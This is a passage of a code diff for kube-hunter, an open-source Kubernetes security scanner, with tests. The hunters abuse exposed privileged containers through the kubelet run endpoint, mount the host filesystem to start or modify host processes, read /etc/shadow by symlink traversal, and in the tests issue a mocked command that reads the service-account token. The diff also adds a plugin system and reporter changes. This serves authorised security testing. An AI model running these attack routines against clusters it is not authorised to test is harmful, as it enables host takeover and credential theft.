self.umount_command(
run_request_url,
file_system_or_partition,
directory_created,
number_of_umount_attempts,
seconds_to_wait_for_os_command,
)

self.rmdir_command(
run_request_url,
directory_created,
number_of_rmdir_attempts,
seconds_to_wait_for_os_command,
)

return {"result": False}
def execute(self, directory_to_create=None, file_name=None):
temp_message = ""

for exposed_existing_privileged_containers in self.event.exposed_existing_privileged_containers:
pod_namespace = exposed_existing_privileged_containers["pod_namespace"]
pod_id = exposed_existing_privileged_containers["pod_id"]
container_name = exposed_existing_privileged_containers["container_name"]

run_request_url = self.base_url + f"run/{pod_namespace}/{pod_id}/{container_name}"

is_exposed_existing_privileged_container_privileged = self.process_exposed_existing_privileged_container(
run_request_url,
self.number_of_umount_attempts,
self.number_of_rmdir_attempts,
self.seconds_to_wait_for_os_command,
directory_to_create,
)

if is_exposed_existing_privileged_container_privileged["result"]:
file_system_or_partition = is_exposed_existing_privileged_container_privileged[
"file_system_or_partition"
]
directory_created = is_exposed_existing_privileged_container_privileged["directory_created"]

# Execute attack attempt: start/modify process in host.
attack_successful_on_exposed_privileged_container = self.attack_exposed_existing_privileged_container(
run_request_url,
directory_created,
self.number_of_rm_attempts,
self.seconds_to_wait_for_os_command,
file_name,
)

if attack_successful_on_exposed_privileged_container["result"]:
file_created = attack_successful_on_exposed_privileged_container["file_created"]

self.clean_attacked_exposed_existing_privileged_container(
run_request_url,
file_system_or_partition,
directory_created,
file_created,
self.number_of_rm_attempts,
self.number_of_umount_attempts,
self.number_of_rmdir_attempts,
self.seconds_to_wait_for_os_command,
)

temp_message += "\n\nPod namespace: {}\n\nPod ID: {}\n\nContainer name: {}".format(
pod_namespace, pod_id, container_name
)

if temp_message:
message = (
"The following exposed existing privileged containers"
+ " have been successfully abused by starting/modifying a process in the host."
+ temp_message
)

self.event.evidence = f"{message}"
else:
message = (
"The following exposed existing privileged containers"
+ " were not successfully abused by starting/modifying a process in the host."
+ "Keep in mind that attackers might use other methods to attempt to abuse them."
+ temp_message
)

self.event.evidence = f"{message}"
@handler.subscribe(ExposedRunHandler)
class ProveRunHandler(ActiveHunter):
"""Kubelet Run Hunter

@@ -453,18 +1048,22 @@ class ProveRunHandler(ActiveHunter):

cmd=command,
)
return self.event.session.post(
f"{self.base_path}/{run_url}", verify=False, timeout=config.network_timeout,
f"{self.base_path}/{run_url}",
verify=False,
timeout=config.network_timeout,
).text

def execute(self):
config = get_config()
r = self.event.session.get(
self.base_path + KubeletHandlers.PODS.value, verify=False, timeout=config.network_timeout,
f"{self.base_path}/" + KubeletHandlers.PODS.value,
verify=False,
timeout=config.network_timeout,
)
if "items" in r.text:
pods_data = r.json()["items"]
for pod_data in pods_data:
container_data = next(pod_data["spec"]["containers"])
container_data = pod_data["spec"]["containers"][0]
if container_data:
output = self.run(
"uname -a",

@@ -493,12 +1092,14 @@ class ProveContainerLogsHandler(ActiveHunter):

def execute(self):
config = get_config()
pods_raw = self.event.session.get(
self.base_url + KubeletHandlers.PODS.value, verify=False, timeout=config.network_timeout,
self.base_url + KubeletHandlers.PODS.value,
verify=False,
timeout=config.network_timeout,
).text
if "items" in pods_raw:
pods_data = json.loads(pods_raw)["items"]
for pod_data in pods_data:
container_data = next(pod_data["spec"]["containers"])
container_data = pod_data["spec"]["containers"][0]
if container_data:
container_name = container_data["name"]
output = requests.get(

@@ -532,11 +1133,16 @@ class ProveSystemLogs(ActiveHunter):

f"{self.base_url}/" + KubeletHandlers.LOGS.value.format(path="audit/audit.log"),
verify=False,
timeout=config.network_timeout,
).text
logger.debug(f"Audit log of host {self.event.host}: {audit_logs[:10]}")
# iterating over proctitles and converting them into readable strings
proctitles = []
for proctitle in re.findall(r"proctitle=(\w+)", audit_logs):
proctitles.append(bytes.fromhex(proctitle).decode("utf-8").replace("\x00", " "))
self.event.proctitles = proctitles
self.event.evidence = f"audit log: {proctitles}"
)

# TODO: add more methods for proving system logs
if audit_logs.status_code == requests.status_codes.codes.OK:
logger.debug(f"Audit log of host {self.event.host}: {audit_logs.text[:10]}")
# iterating over proctitles and converting them into readable strings
proctitles = []
for proctitle in re.findall(r"proctitle=(\w+)", audit_logs.text):
proctitles.append(bytes.fromhex(proctitle).decode("utf-8").replace("\x00", " "))
self.event.proctitles = proctitles
self.event.evidence = f"audit log: {proctitles}"
else:
self.event.evidence = "Could not parse system logs"
@@ -25,10 +25,14 @@ class WriteMountToVarLog(Vulnerability, Event):

def __init__(self, pods):
Vulnerability.__init__(
self, KubernetesCluster, "Pod With Mount To /var/log", category=PrivilegeEscalation, vid="KHV047",
self,
KubernetesCluster,
"Pod With Mount To /var/log",
category=PrivilegeEscalation,
vid="KHV047",
)
self.pods = pods
self.evidence = "pods: {}".format(", ".join((pod["metadata"]["name"] for pod in self.pods)))
self.evidence = "pods: {}".format(", ".join(pod["metadata"]["name"] for pod in self.pods))


class DirectoryTraversalWithKubelet(Vulnerability, Event):

@@ -37,10 +41,13 @@ class DirectoryTraversalWithKubelet(Vulnerability, Event):

def __init__(self, output):
Vulnerability.__init__(
self, KubernetesCluster, "Root Traversal Read On The Kubelet", category=PrivilegeEscalation,
self,
KubernetesCluster,
"Root Traversal Read On The Kubelet",
category=PrivilegeEscalation,
)
self.output = output
self.evidence = "output: {}".format(self.output)
self.evidence = f"output: {self.output}"


@handler.subscribe(ExposedPodsHandler)

@@ -82,7 +89,10 @@ class ProveVarLogMount(ActiveHunter):

def run(self, command, container):
run_url = KubeletHandlers.RUN.value.format(
podNamespace=container["namespace"], podID=container["pod"], containerName=container["name"], cmd=command,
podNamespace=container["namespace"],
podID=container["pod"],
containerName=container["name"],
cmd=command,
)
return self.event.session.post(f"{self.base_path}/{run_url}", verify=False).text

@@ -91,7 +101,9 @@ class ProveVarLogMount(ActiveHunter):

config = get_config()
logger.debug("accessing /pods manually on ProveVarLogMount")
pods = self.event.session.get(
f"{self.base_path}/" + KubeletHandlers.PODS.value, verify=False, timeout=config.network_timeout,
f"{self.base_path}/" + KubeletHandlers.PODS.value,
verify=False,
timeout=config.network_timeout,
).json()["items"]
for pod in pods:
volume = VarLogMountHunter(ExposedPodsHandler(pods=pods)).has_write_mount_to(pod, "/var/log")

@@ -117,7 +129,9 @@ class ProveVarLogMount(ActiveHunter):

path=re.sub(r"^/var/log", "", host_path) + symlink_name
)
content = self.event.session.get(
f"{self.base_path}/{path_in_logs_endpoint}", verify=False, timeout=config.network_timeout,
f"{self.base_path}/{path_in_logs_endpoint}",
verify=False,
timeout=config.network_timeout,
).text
# removing symlink
self.run(f"rm {mount_path}/{symlink_name}", container=container)

@@ -134,7 +148,10 @@ class ProveVarLogMount(ActiveHunter):

}
try:
output = self.traverse_read(
"/etc/shadow", container=cont, mount_path=mount_path, host_path=volume["hostPath"]["path"],
"/etc/shadow",
container=cont,
mount_path=mount_path,
host_path=volume["hostPath"]["path"],
)
self.publish_event(DirectoryTraversalWithKubelet(output=output))
except Exception:
@@ -23,7 +23,11 @@ class KubeProxyExposed(Vulnerability, Event):

def __init__(self):
Vulnerability.__init__(
self, KubernetesCluster, "Proxy Exposed", category=InformationDisclosure, vid="KHV049",
self,
KubernetesCluster,
"Proxy Exposed",
category=InformationDisclosure,
vid="KHV049",
)

@@ -89,7 +93,9 @@ class ProveProxyExposed(ActiveHunter):

def execute(self):
config = get_config()
version_metadata = requests.get(
f"http://{self.event.host}:{self.event.port}/version", verify=False, timeout=config.network_timeout,
f"http://{self.event.host}:{self.event.port}/version",
verify=False,
timeout=config.network_timeout,
).json()
if "buildDate" in version_metadata:
self.event.evidence = "build date: {}".format(version_metadata["buildDate"])

@@ -107,11 +113,15 @@ class K8sVersionDisclosureProve(ActiveHunter):

def execute(self):
config = get_config()
version_metadata = requests.get(
f"http://{self.event.host}:{self.event.port}/version", verify=False, timeout=config.network_timeout,
f"http://{self.event.host}:{self.event.port}/version",
verify=False,
timeout=config.network_timeout,
).json()
if "gitVersion" in version_metadata:
self.publish_event(
K8sVersionDisclosure(
version=version_metadata["gitVersion"], from_endpoint="/version", extra_info="on kube-proxy",
version=version_metadata["gitVersion"],
from_endpoint="/version",
extra_info="on kube-proxy",
)
)

@@ -28,7 +28,10 @@ class SecretsAccess(Vulnerability, Event):

def __init__(self, evidence):
Vulnerability.__init__(
self, component=KubernetesCluster, name="Access to pod's secrets", category=AccessRisk,
self,
component=KubernetesCluster,
name="Access to pod's secrets",
category=AccessRisk,
)
self.evidence = evidence
@@ -7,6 +7,9 @@ from kube_hunter.modules.report.collector import (

vulnerabilities_lock,
)

BASE_KB_LINK = "https://avd.aquasec.com/"
FULL_KB_LINK = "https://avd.aquasec.com/kube-hunter/{vid}/"


class BaseReporter:
def get_nodes(self):

@@ -38,6 +41,7 @@ class BaseReporter:

"vulnerability": vuln.get_name(),
"description": vuln.explain(),
"evidence": str(vuln.evidence),
"avd_reference": FULL_KB_LINK.format(vid=vuln.get_vid().lower()),
"hunter": vuln.hunter.get_name(),
}
for vuln in vulnerabilities

@@ -63,6 +67,4 @@ class BaseReporter:

if statistics:
report["hunter_statistics"] = self.get_hunter_statistics()

report["kburl"] = "https://aquasecurity.github.io/kube-hunter/kb/{vid}"

return report

@@ -12,7 +12,10 @@ class HTTPDispatcher:

dispatch_url = os.environ.get("KUBEHUNTER_HTTP_DISPATCH_URL", "https://localhost/")
try:
r = requests.request(
dispatch_method, dispatch_url, json=report, headers={"Content-Type": "application/json"},
dispatch_method,
dispatch_url,
json=report,
headers={"Content-Type": "application/json"},
)
r.raise_for_status()
logger.info(f"Report was dispatched to: {dispatch_url}")

@@ -1,6 +1,6 @@

from prettytable import ALL, PrettyTable

from kube_hunter.modules.report.base import BaseReporter
from kube_hunter.modules.report.base import BaseReporter, BASE_KB_LINK
from kube_hunter.modules.report.collector import (
services,
vulnerabilities,

@@ -9,9 +9,8 @@ from kube_hunter.modules.report.collector import (

vulnerabilities_lock,
)

EVIDENCE_PREVIEW = 40
EVIDENCE_PREVIEW = 100
MAX_TABLE_WIDTH = 20
KB_LINK = "https://github.com/aquasecurity/kube-hunter/tree/master/docs/_kb"


class PlainReporter(BaseReporter):

@@ -60,7 +59,7 @@ class PlainReporter(BaseReporter):

if service.event_id not in id_memory:
nodes_table.add_row(["Node/Master", service.host])
id_memory.add(service.event_id)
nodes_ret = "\nNodes\n{}\n".format(nodes_table)
nodes_ret = f"\nNodes\n{nodes_table}\n"
services_lock.release()
return nodes_ret

@@ -114,7 +113,7 @@ class PlainReporter(BaseReporter):

return (
"\nVulnerabilities\n"
"For further information about a vulnerability, search its ID in: \n"
f"{KB_LINK}\n{vuln_table}\n"
f"{BASE_KB_LINK}\n{vuln_table}\n"
)

def hunters_table(self):
23
kube_hunter/plugins/__init__.py
Normal file

@@ -0,0 +1,23 @@

import pluggy

from kube_hunter.plugins import hookspecs

hookimpl = pluggy.HookimplMarker("kube-hunter")


def initialize_plugin_manager():
"""
Initializes and loads all default and setup implementations for registered plugins

@return: initialized plugin manager
"""
pm = pluggy.PluginManager("kube-hunter")
pm.add_hookspecs(hookspecs)
pm.load_setuptools_entrypoints("kube_hunter")

# default registration of builtin implemented plugins
from kube_hunter.conf import parser

pm.register(parser)

return pm
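As an aside, a rough sketch (not part of this diff) of how the new plugin manager could be driven from a kube-hunter entry point; the argparse wiring below is illustrative only, not the project's actual main module:

```python
from argparse import ArgumentParser

from kube_hunter.plugins import initialize_plugin_manager

# Build the pluggy plugin manager introduced in this PR.
pm = initialize_plugin_manager()

parser = ArgumentParser(description="kube-hunter")
# Every registered plugin gets a chance to add its own CLI flags.
pm.hook.parser_add_arguments(parser=parser)

args = parser.parse_args()
# Let plugins run their own setup once arguments are known.
pm.hook.load_plugin(args=args)
```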
24
kube_hunter/plugins/hookspecs.py
Normal file
@@ -0,0 +1,24 @@
import pluggy
from argparse import ArgumentParser

hookspec = pluggy.HookspecMarker("kube-hunter")

@hookspec
def parser_add_arguments(parser: ArgumentParser):
"""Add arguments to the ArgumentParser.

If a plugin requires an aditional argument, it should implement this hook
and add the argument to the Argument Parser

@param parser: an ArgumentParser, calls parser.add_argument on it
"""

@hookspec
def load_plugin(args):
"""Plugins that wish to execute code after the argument parsing
should implement this hook.

@param args: all parsed arguments passed to kube-hunter
"""
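A plugin module then implements these hook specifications with the hookimpl marker defined in kube_hunter.plugins. A minimal sketch (the --example flag and its handling are hypothetical, for illustration only):

    from kube_hunter.plugins import hookimpl

    @hookimpl
    def parser_add_arguments(parser):
        # hypothetical option, contributed before kube-hunter parses its arguments
        parser.add_argument("--example", action="store_true", help="enable example behaviour")

    @hookimpl
    def load_plugin(args):
        # runs after argument parsing; args holds the parsed namespace
        if getattr(args, "example", False):
            print("example plugin loaded")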
3
pyinstaller_hooks/hook-prettytable.py
Normal file
@@ -0,0 +1,3 @@
from PyInstaller.utils.hooks import collect_all

datas, binaries, hiddenimports = collect_all("prettytable")
@@ -2,7 +2,7 @@

flake8
pytest >= 2.9.1
requests-mock
requests-mock >= 1.8
coverage < 5.0
pytest-cov
setuptools >= 30.3.0
@@ -14,3 +14,4 @@ black
pre-commit
flake8-bugbear
flake8-mypy
pluggy

@@ -22,6 +22,8 @@ classifiers =
Programming Language :: Python :: 3.6
Programming Language :: Python :: 3.7
Programming Language :: Python :: 3.8
Programming Language :: Python :: 3.9
Programming Language :: Python :: 3 :: Only
Topic :: Security

[options]
@@ -38,6 +40,7 @@ install_requires =
future
packaging
dataclasses
pluggy
setup_requires =
setuptools>=30.3.0
setuptools_scm
2
setup.py
@@ -41,6 +41,8 @@ class PyInstallerCommand(Command):
cfg.read("setup.cfg")
command = [
"pyinstaller",
"--additional-hooks-dir",
"pyinstaller_hooks",
"--clean",
"--onefile",
"--name",
@@ -11,12 +11,13 @@ def test_setup_logger_level():
("NOTEXISTS", logging.INFO),
("BASIC_FORMAT", logging.INFO),
]
logFile = None
for level, expected in test_cases:
setup_logger(level)
setup_logger(level, logFile)
actual = logging.getLogger().getEffectiveLevel()
assert actual == expected, f"{level} level should be {expected} (got {actual})"

def test_setup_logger_none():
setup_logger("NONE")
setup_logger("NONE", None)
assert logging.getLogger().manager.disable == logging.CRITICAL

@@ -8,7 +8,7 @@ set_config(Config())

def test_presetcloud():
""" Testing if it doesn't try to run get_cloud if the cloud type is already set.
"""Testing if it doesn't try to run get_cloud if the cloud type is already set.
get_cloud(1.2.3.4) will result with an error
"""
expcted = "AWS"
@@ -28,11 +28,13 @@ from kube_hunter.modules.hunting.dashboard import KubeDashboard
from kube_hunter.modules.hunting.dns import DnsSpoofHunter
from kube_hunter.modules.hunting.etcd import EtcdRemoteAccess, EtcdRemoteAccessActive
from kube_hunter.modules.hunting.kubelet import (
ProveAnonymousAuth,
MaliciousIntentViaSecureKubeletPort,
ProveContainerLogsHandler,
ProveRunHandler,
ProveSystemLogs,
ReadOnlyKubeletPortHunter,
SecureKubeletPortHunter,
ProveRunHandler,
ProveContainerLogsHandler,
ProveSystemLogs,
)
from kube_hunter.modules.hunting.mounts import VarLogMountHunter, ProveVarLogMount
from kube_hunter.modules.hunting.proxy import KubeProxy, ProveProxyExposed, K8sVersionDisclosureProve
@@ -77,6 +79,8 @@ ACTIVE_HUNTERS = {
ProveVarLogMount,
ProveProxyExposed,
K8sVersionDisclosureProve,
ProveAnonymousAuth,
MaliciousIntentViaSecureKubeletPort,
}

@@ -20,7 +20,9 @@ def test_ApiServer():
m.get("https://mockOther:443", text="elephant")
m.get("https://mockKubernetes:443", text='{"code":403}', status_code=403)
m.get(
"https://mockKubernetes:443/version", text='{"major": "1.14.10"}', status_code=200,
"https://mockKubernetes:443/version",
text='{"major": "1.14.10"}',
status_code=200,
)

e = Event()

@@ -44,11 +46,15 @@ def test_ApiServerWithServiceAccountToken():
counter = 0
with requests_mock.Mocker() as m:
m.get(
"https://mockKubernetes:443", request_headers={"Authorization": "Bearer very_secret"}, text='{"code":200}',
"https://mockKubernetes:443",
request_headers={"Authorization": "Bearer very_secret"},
text='{"code":200}',
)
m.get("https://mockKubernetes:443", text='{"code":403}', status_code=403)
m.get(
"https://mockKubernetes:443/version", text='{"major": "1.14.10"}', status_code=200,
"https://mockKubernetes:443/version",
text='{"major": "1.14.10"}',
status_code=200,
)
m.get("https://mockOther:443", text="elephant")

@@ -117,7 +123,7 @@ def test_InsecureApiServer():

# We should only generate an ApiServer event for a response that looks like it came from a Kubernetes node
@handler.subscribe(ApiServer)
class testApiServer(object):
class testApiServer:
def __init__(self, event):
print("Event")
assert event.host == "mockKubernetes"

@@ -90,7 +90,7 @@ class TestDiscoveryUtils:
def test_generate_hosts_valid_ignore():
remove = IPAddress("192.168.1.8")
scan = "192.168.1.0/24"
expected = set(ip for ip in IPNetwork(scan) if ip != remove)
expected = {ip for ip in IPNetwork(scan) if ip != remove}

actual = set(HostDiscoveryHelpers.generate_hosts([scan, f"!{str(remove)}"]))
49
tests/hunting/test_aks.py
Normal file
@@ -0,0 +1,49 @@
# flake8: noqa: E402
import requests_mock

from kube_hunter.conf import Config, set_config

import json

set_config(Config())

from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler
from kube_hunter.modules.hunting.aks import AzureSpnHunter

def test_AzureSpnHunter():
e = ExposedPodsHandler(pods=[])
pod_template = '{{"items":[ {{"apiVersion":"v1","kind":"Pod","metadata":{{"name":"etc","namespace":"default"}},"spec":{{"containers":[{{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{{"mountPath":"/mp","name":"v"}}]}}],"volumes":[{{"hostPath":{{"path":"{}"}},"name":"v"}}]}}}} ]}}'

bad_paths = ["/", "/etc", "/etc/", "/etc/kubernetes", "/etc/kubernetes/azure.json"]
good_paths = ["/yo", "/etc/yo", "/etc/kubernetes/yo.json"]

for p in bad_paths:
e.pods = json.loads(pod_template.format(p))["items"]
h = AzureSpnHunter(e)
c = h.get_key_container()
assert c

for p in good_paths:
e.pods = json.loads(pod_template.format(p))["items"]
h = AzureSpnHunter(e)
c = h.get_key_container()
assert c == None

pod_no_volume_mounts = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}],"volumes":[{"hostPath":{"path":"/whatever"},"name":"v"}]}} ]}'
e.pods = json.loads(pod_no_volume_mounts)["items"]
h = AzureSpnHunter(e)
c = h.get_key_container()
assert c == None

pod_no_volumes = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}]}} ]}'
e.pods = json.loads(pod_no_volumes)["items"]
h = AzureSpnHunter(e)
c = h.get_key_container()
assert c == None

pod_other_volume = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{"mountPath":"/mp","name":"v"}]}],"volumes":[{"emptyDir":{},"name":"v"}]}} ]}'
e.pods = json.loads(pod_other_volume)["items"]
h = AzureSpnHunter(e)
c = h.get_key_container()
assert c == None
@@ -56,7 +56,8 @@ def test_AccessApiServer():
with requests_mock.Mocker() as m:
m.get("https://mockKubernetes:443/api", text="{}")
m.get(
"https://mockKubernetes:443/api/v1/namespaces", text='{"items":[{"metadata":{"name":"hello"}}]}',
"https://mockKubernetes:443/api/v1/namespaces",
text='{"items":[{"metadata":{"name":"hello"}}]}',
)
m.get(
"https://mockKubernetes:443/api/v1/pods",
@@ -64,10 +65,12 @@ def test_AccessApiServer():
{"metadata":{"name":"podB", "namespace":"namespaceB"}}]}',
)
m.get(
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/roles", status_code=403,
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/roles",
status_code=403,
)
m.get(
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/clusterroles", text='{"items":[]}',
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/clusterroles",
text='{"items":[]}',
)
m.get(
"https://mockkubernetes:443/version",
@@ -91,7 +94,8 @@ def test_AccessApiServer():
# TODO check that these responses reflect what Kubernetes does
m.get("https://mocktoken:443/api", text="{}")
m.get(
"https://mocktoken:443/api/v1/namespaces", text='{"items":[{"metadata":{"name":"hello"}}]}',
"https://mocktoken:443/api/v1/namespaces",
text='{"items":[{"metadata":{"name":"hello"}}]}',
)
m.get(
"https://mocktoken:443/api/v1/pods",
@@ -99,7 +103,8 @@ def test_AccessApiServer():
{"metadata":{"name":"podB", "namespace":"namespaceB"}}]}',
)
m.get(
"https://mocktoken:443/apis/rbac.authorization.k8s.io/v1/roles", status_code=403,
"https://mocktoken:443/apis/rbac.authorization.k8s.io/v1/roles",
status_code=403,
)
m.get(
"https://mocktoken:443/apis/rbac.authorization.k8s.io/v1/clusterroles",
@@ -117,7 +122,7 @@ def test_AccessApiServer():

@handler.subscribe(ListNamespaces)
class test_ListNamespaces(object):
class test_ListNamespaces:
def __init__(self, event):
print("ListNamespaces")
assert event.evidence == ["hello"]
@@ -130,7 +135,7 @@ class test_ListNamespaces(object):

@handler.subscribe(ListPodsAndNamespaces)
class test_ListPodsAndNamespaces(object):
class test_ListPodsAndNamespaces:
def __init__(self, event):
print("ListPodsAndNamespaces")
assert len(event.evidence) == 2
@@ -153,7 +158,7 @@ class test_ListPodsAndNamespaces(object):

# Should never see this because the API call in the test returns 403 status code
@handler.subscribe(ListRoles)
class test_ListRoles(object):
class test_ListRoles:
def __init__(self, event):
print("ListRoles")
assert 0
@@ -164,7 +169,7 @@ class test_ListRoles(object):
# Should only see this when we have a token because the API call returns an empty list of items
# in the test where we have no token
@handler.subscribe(ListClusterRoles)
class test_ListClusterRoles(object):
class test_ListClusterRoles:
def __init__(self, event):
print("ListClusterRoles")
assert event.auth_token == "so-secret"
@@ -173,7 +178,7 @@ class test_ListClusterRoles(object):

@handler.subscribe(ServerApiAccess)
class test_ServerApiAccess(object):
class test_ServerApiAccess:
def __init__(self, event):
print("ServerApiAccess")
if event.category == UnauthenticatedAccess:
@@ -186,7 +191,7 @@ class test_ServerApiAccess(object):

@handler.subscribe(ApiServerPassiveHunterFinished)
class test_PassiveHunterFinished(object):
class test_PassiveHunterFinished:
def __init__(self, event):
print("PassiveHunterFinished")
assert event.namespaces == ["hello"]
@@ -228,10 +233,12 @@ def test_AccessApiServerActive():
)
m.post("https://mockKubernetes:443/api/v1/clusterroles", text="{}")
m.post(
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/clusterroles", text="{}",
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/clusterroles",
text="{}",
)
m.post(
"https://mockkubernetes:443/api/v1/namespaces/hello-namespace/pods", text="{}",
"https://mockkubernetes:443/api/v1/namespaces/hello-namespace/pods",
text="{}",
)
m.post(
"https://mockkubernetes:443" "/apis/rbac.authorization.k8s.io/v1/namespaces/hello-namespace/roles",
@@ -269,12 +276,12 @@ def test_AccessApiServerActive():

@handler.subscribe(CreateANamespace)
class test_CreateANamespace(object):
class test_CreateANamespace:
def __init__(self, event):
assert "abcde" in event.evidence

@handler.subscribe(DeleteANamespace)
class test_DeleteANamespace(object):
class test_DeleteANamespace:
def __init__(self, event):
assert "2019-02-26" in event.evidence

@@ -37,6 +37,6 @@ rceJuGsnJEQ=

@handler.subscribe(CertificateEmail)
class test_CertificateEmail(object):
class test_CertificateEmail:
def __init__(self, event):
assert event.email == b"build@nodejs.org0"

@@ -41,7 +41,7 @@ def test_K8sCveHunter():

@handler.subscribe(ServerApiVersionEndPointAccessPE)
class test_CVE_2018_1002105(object):
class test_CVE_2018_1002105:
def __init__(self, event):
global cve_counter
cve_counter += 1
721
tests/hunting/test_kubelet.py
Normal file
@@ -0,0 +1,721 @@
import requests
import requests_mock
import urllib.parse
import uuid

from kube_hunter.core.events import handler
from kube_hunter.modules.hunting.kubelet import (
AnonymousAuthEnabled,
ExposedExistingPrivilegedContainersViaSecureKubeletPort,
ProveAnonymousAuth,
MaliciousIntentViaSecureKubeletPort,
)

counter = 0
pod_list_with_privileged_container = """{
"kind": "PodList",
"apiVersion": "v1",
"metadata": {},
"items": [
{
"metadata": {
"name": "kube-hunter-privileged-deployment-86dc79f945-sjjps",
"namespace": "kube-hunter-privileged"
},
"spec": {
"containers": [
{
"name": "ubuntu",
"securityContext": {
{security_context_definition_to_test}
}
}
]
}
}
]
}
"""
service_account_token = "eyJhbGciOiJSUzI1NiIsImtpZCI6IlR0YmxoMXh..."
env = """PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
HOSTNAME=kube-hunter-privileged-deployment-86dc79f945-sjjps
KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
HOME=/root"""
exposed_privileged_containers = [
{
"container_name": "ubuntu",
"environment_variables": env,
"pod_id": "kube-hunter-privileged-deployment-86dc79f945-sjjps",
"pod_namespace": "kube-hunter-privileged",
"service_account_token": service_account_token,
}
]
cat_proc_cmdline = "BOOT_IMAGE=/boot/bzImage root=LABEL=Mock loglevel=3 console=ttyS0"
number_of_rm_attempts = 1
number_of_umount_attempts = 1
number_of_rmdir_attempts = 1

def create_test_event_type_one():
anonymous_auth_enabled_event = AnonymousAuthEnabled()

anonymous_auth_enabled_event.host = "localhost"
anonymous_auth_enabled_event.session = requests.Session()

return anonymous_auth_enabled_event

def create_test_event_type_two():
exposed_existing_privileged_containers_via_secure_kubelet_port_event = (
ExposedExistingPrivilegedContainersViaSecureKubeletPort(exposed_privileged_containers)
)
exposed_existing_privileged_containers_via_secure_kubelet_port_event.host = "localhost"
exposed_existing_privileged_containers_via_secure_kubelet_port_event.session = requests.Session()

return exposed_existing_privileged_containers_via_secure_kubelet_port_event

def test_get_request_valid_url():
class_being_tested = ProveAnonymousAuth(create_test_event_type_one())

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/mock"

session_mock.get(url, text="mock")

return_value = class_being_tested.get_request(url)

assert return_value == "mock"

def test_get_request_invalid_url():
class_being_tested = ProveAnonymousAuth(create_test_event_type_one())

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/[mock]"

session_mock.get(url, exc=requests.exceptions.InvalidURL)

return_value = class_being_tested.get_request(url)

assert return_value.startswith("Exception: ")

def post_request(url, params, expected_return_value, exception=None):
class_being_tested_one = ProveAnonymousAuth(create_test_event_type_one())

with requests_mock.Mocker(session=class_being_tested_one.event.session) as session_mock:
mock_params = {"text": "mock"} if not exception else {"exc": exception}
session_mock.post(url, **mock_params)

return_value = class_being_tested_one.post_request(url, params)

assert return_value == expected_return_value

class_being_tested_two = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two())

with requests_mock.Mocker(session=class_being_tested_two.event.session) as session_mock:
mock_params = {"text": "mock"} if not exception else {"exc": exception}
session_mock.post(url, **mock_params)

return_value = class_being_tested_two.post_request(url, params)

assert return_value == expected_return_value

def test_post_request_valid_url_with_parameters():
url = "https://localhost:10250/mock?cmd=ls"
params = {"cmd": "ls"}
post_request(url, params, expected_return_value="mock")

def test_post_request_valid_url_without_parameters():
url = "https://localhost:10250/mock"
params = {}
post_request(url, params, expected_return_value="mock")

def test_post_request_invalid_url_with_parameters():
url = "https://localhost:10250/mock?cmd=ls"
params = {"cmd": "ls"}
post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL)

def test_post_request_invalid_url_without_parameters():
url = "https://localhost:10250/mock"
params = {}
post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL)

def test_has_no_exception_result_with_exception():
mock_result = "Exception: Mock."

return_value = ProveAnonymousAuth.has_no_exception(mock_result)

assert return_value is False

def test_has_no_exception_result_without_exception():
mock_result = "Mock."

return_value = ProveAnonymousAuth.has_no_exception(mock_result)

assert return_value is True

def test_has_no_error_result_with_error():
mock_result = "Mock exited with error."

return_value = ProveAnonymousAuth.has_no_error(mock_result)

assert return_value is False

def test_has_no_error_result_without_error():
mock_result = "Mock."

return_value = ProveAnonymousAuth.has_no_error(mock_result)

assert return_value is True

def test_has_no_error_nor_exception_result_without_exception_and_without_error():
mock_result = "Mock."

return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)

assert return_value is True

def test_has_no_error_nor_exception_result_with_exception_and_without_error():
mock_result = "Exception: Mock."

return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)

assert return_value is False

def test_has_no_error_nor_exception_result_without_exception_and_with_error():
mock_result = "Mock exited with error."

return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)

assert return_value is False

def test_has_no_error_nor_exception_result_with_exception_and_with_error():
mock_result = "Exception: Mock. Mock exited with error."

return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)

assert return_value is False

def proveanonymousauth_success(anonymous_auth_enabled_event, security_context_definition_to_test):
global counter
counter = 0

with requests_mock.Mocker(session=anonymous_auth_enabled_event.session) as session_mock:
url = "https://" + anonymous_auth_enabled_event.host + ":10250/"
listing_pods_url = url + "pods"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="

session_mock.get(
listing_pods_url,
text=pod_list_with_privileged_container.replace(
"{security_context_definition_to_test}", security_context_definition_to_test
),
)
session_mock.post(
run_url + urllib.parse.quote("cat /var/run/secrets/kubernetes.io/serviceaccount/token", safe=""),
text=service_account_token,
)
